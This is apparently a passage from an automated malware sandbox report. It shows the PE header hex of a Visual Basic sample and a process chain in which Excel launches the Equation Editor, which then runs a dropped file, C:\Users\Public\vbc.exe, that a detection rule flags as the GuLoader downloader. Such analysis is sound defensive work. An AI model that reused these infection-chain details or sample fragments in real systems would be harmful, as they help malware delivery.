      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b5 9c 66 49 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 03 00 00 a0 00 00 00 00 00 00 3c 13 00 00 00 10 00 00 00 70 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 10 04 00 00 10 00 00 5e 69 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 64 03 00 28 00 00 00 00 80 03 00 e2 80 00 00 00 00 00 00 00 00 00 00 50 10 04 00 18 14 00 00 00 00 00 00 00 00 00 00 00 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 59 03 00 00 10 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 90 0b 00 00 00 70 03 00 00 10 00 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e2 80 00 00 00 80 03 00 00 90 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$yRichPELfI`<p@^id(P( .textY` `.datapp@.rsrc@@IMSVBVM60.DLL


      Code Manipulations

      Statistics

      Behavior

      Click to jump to process

      System Behavior

      General

      Start time:19:38:40
      Start date:19/07/2021
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Imagebase:0x13f110000
      File size:27641504 bytes
      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:19:39:02
      Start date:19/07/2021
      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Wow64 process (32bit):true
      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Imagebase:0x400000
      File size:543304 bytes
      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:19:39:05
      Start date:19/07/2021
      Path:C:\Users\Public\vbc.exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\Public\vbc.exe'
      Imagebase:0x400000
      File size:271464 bytes
      MD5 hash:08730CDD286A4C9D46B38BB6545AC311
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Visual Basic
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2354861374.00000000003B0000.00000040.00000001.sdmp, Author: Joe Security
      Reputation:low

      Disassembly

      Code Analysis

      Reset < >